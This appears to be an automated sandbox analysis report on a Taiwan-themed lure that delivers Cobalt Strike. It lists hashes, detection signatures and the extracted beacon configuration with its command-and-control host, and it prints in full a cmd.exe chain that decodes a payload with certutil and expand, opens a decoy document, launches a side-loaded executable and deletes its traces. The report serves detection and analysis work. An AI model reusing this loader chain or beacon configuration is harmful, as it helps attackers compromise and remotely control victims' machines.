Analysis
-
max time kernel
136s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2024 11:04
Static task
static1
Behavioral task
behavioral1
Sample
China's_gray-zone_warfare_against_Taiwan/China's_gray-zone_warfare_against_Taiwan.doc.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
China's_gray-zone_warfare_against_Taiwan/China's_gray-zone_warfare_against_Taiwan.doc.lnk
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
China's_gray-zone_warfare_against_Taiwan/__MACOS/_params.cat.js
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
China's_gray-zone_warfare_against_Taiwan/__MACOS/_params.cat.js
Resource
win10v2004-20231215-en
General
-
Target
China's_gray-zone_warfare_against_Taiwan/__MACOS/_params.cat.js
-
Size
1.4MB
-
MD5
83be472a5402d0b32e40cc6d761a8a37
-
SHA1
e44732160aae29881342dfde89db0fe9aa984f7f
-
SHA256
434517ef2e12af66ef97b740e4caf9b07a73f1321bf013b6ee6dd0d180804409
-
SHA512
0c490221d52f7460608cb85be047aa36337ca5c1e6b0de39b870ef41dab23a96eef36e05a400e1848c6136e9d34f4c3f1a72dd390c80798d9bb3148cf3271c0d
-
SSDEEP
24576:lWGkPK8x3nD7v6hfaMk4HY7rlho/S28f2HCQbuNc0W1w/HiELEVZ7110Yy36ht6Y:/
Malware Config
Extracted
cobaltstrike
100000000
http://upserver.updateservice.store:443/common.html
-
access_type
512
-
beacon_type
2048
-
host
upserver.updateservice.store,/common.html
-
http_header1
AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAcAAAAAAAAACwAAAAMAAAACAAAAA2x1PQAAAAYAAAAGQ29va2llAAAACQAAAAt2ZXJpZnk9dHJ1ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAvQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAAAAHAAAAAQAAAAMAAAADAAAAAgAAAAhhdXRob3JzPQAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
jitter
9472
-
polling_time
58666
-
port_number
443
-
sc_process32
%windir%\syswow64\svchost.exe
-
sc_process64
%windir%\sysnative\svchost.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCdQ5nVpJ13O9CwiQRtLOdTAwGg6oj4mvtVqZvCbSy9YyU3ngZSDBgmWjSMwrTqMvvKUr5RvigK1N00xTGT4LVtDESUaUvyGU79G24yPaF5rUOJjnAIRazosjB87DvXbI6k45HQsVyZD7wgEXnKFmv3E0Tk9ti5G0eVOKL5tqdS5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
6.1158912e+08
-
unknown2
AAAABAAAAAIAAAJYAAAAAwAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/r-arrow
-
user_agent
Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)
-
watermark
100000000
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
Processes:
360se.exepid process 3048 360se.exe -
Loads dropped DLL 1 IoCs
Processes:
360se.exepid process 3048 360se.exe -
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\LOGS\DPX\setupact.log expand.exe File opened for modification C:\Windows\LOGS\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2064 WINWORD.EXE 2064 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
WINWORD.EXEpid process 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE 2064 WINWORD.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exedescription pid process target process PID 2820 wrote to memory of 1632 2820 cmd.exe PID 2820 wrote to memory of 1632 2820 cmd.exe PID 1632 wrote to memory of 2264 1632 cmd.exe findstr.exe PID 1632 wrote to memory of 2264 1632 cmd.exe findstr.exe PID 1632 wrote to memory of 1940 1632 cmd.exe certutil.exe PID 1632 wrote to memory of 1940 1632 cmd.exe certutil.exe PID 1632 wrote to memory of 4092 1632 cmd.exe expand.exe PID 1632 wrote to memory of 4092 1632 cmd.exe expand.exe PID 1632 wrote to memory of 2064 1632 cmd.exe WINWORD.EXE PID 1632 wrote to memory of 2064 1632 cmd.exe WINWORD.EXE PID 1632 wrote to memory of 3048 1632 cmd.exe 360se.exe PID 1632 wrote to memory of 3048 1632 cmd.exe 360se.exe PID 1632 wrote to memory of 3048 1632 cmd.exe 360se.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\China's_gray-zone_warfare_against_Taiwan\__MACOS\_params.cat.js1⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp > C:\Users\Admin\AppData\Roaming\sxytyM.tmp&for /r c:\windows\system32\ %i in (*ertu*.exe) do %i -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp&expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\&start C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc&start C:\Users\Admin\AppData\Roaming\360se.exe&del C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\findstr.exefindstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp3⤵
-
\??\c:\windows\system32\certutil.exec:\windows\system32\certutil.exe -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp3⤵
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc" /o ""3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\expand.exeexpand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\3⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Roaming\360se.exeC:\Users\Admin\AppData\Roaming\360se.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\lFbRwJ.tmpFilesize
1024KB
MD5a8aaf88058de4898468d774bcc39cf47
SHA1ee28eadfae02def1213b56d87633b3689cebca94
SHA256c99b999b271f193fcd66c538634a9306065067df01ebdc5d616bacc305414008
SHA5121c1df33638a23eab90fb80464ccc8b04bc5f87304135b24f1f7beafe2a6c1fa0690e26d85f3de11ce15839b12996372f774391a80e9b4b4dea9ab03c83794afc
-
C:\Users\Admin\AppData\Roaming\sxytyM.tmpFilesize
86KB
MD53e7df42efc760f0eb36f166dfd421ff7
SHA1fa7e5a9b294a2e6cae611d68443ba067a377bc28
SHA256ea15c7cfbb0ecffc7db9896ffab3df6a1128887076c6a389cb34c6983ec0c3ff
SHA512b6673c282fa92c3cf961ccf2eb5bdf170c6ea14a538c5f652cf3a3deb6926d443af0e31e8f79d388fe93e61d652c73884ec98b404abca0c96819412a3e6a25ce
-
\??\c:\users\admin\appdata\roaming\sfnlzw.tmpMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2064-31-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-34-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-29-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-28-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-36-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-39-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-42-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-44-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-43-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-41-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-40-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-38-0x00007FF8D21F0000-0x00007FF8D2200000-memory.dmpFilesize
64KB
-
memory/2064-37-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-35-0x00007FF8D21F0000-0x00007FF8D2200000-memory.dmpFilesize
64KB
-
memory/2064-33-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-27-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-32-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-26-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-30-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-25-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-24-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-21-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-20-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-108-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-109-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-111-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-87-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-88-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-89-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-110-0x00007FF8D4330000-0x00007FF8D4340000-memory.dmpFilesize
64KB
-
memory/2064-113-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-114-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/2064-112-0x00007FF9142B0000-0x00007FF9144A5000-memory.dmpFilesize
2.0MB
-
memory/3048-64-0x0000000000EE0000-0x0000000000F68000-memory.dmpFilesize
544KB
-
memory/3048-56-0x0000000000D40000-0x0000000000D74000-memory.dmpFilesize
208KB
-
memory/3048-57-0x0000000000EE0000-0x0000000000F68000-memory.dmpFilesize
544KB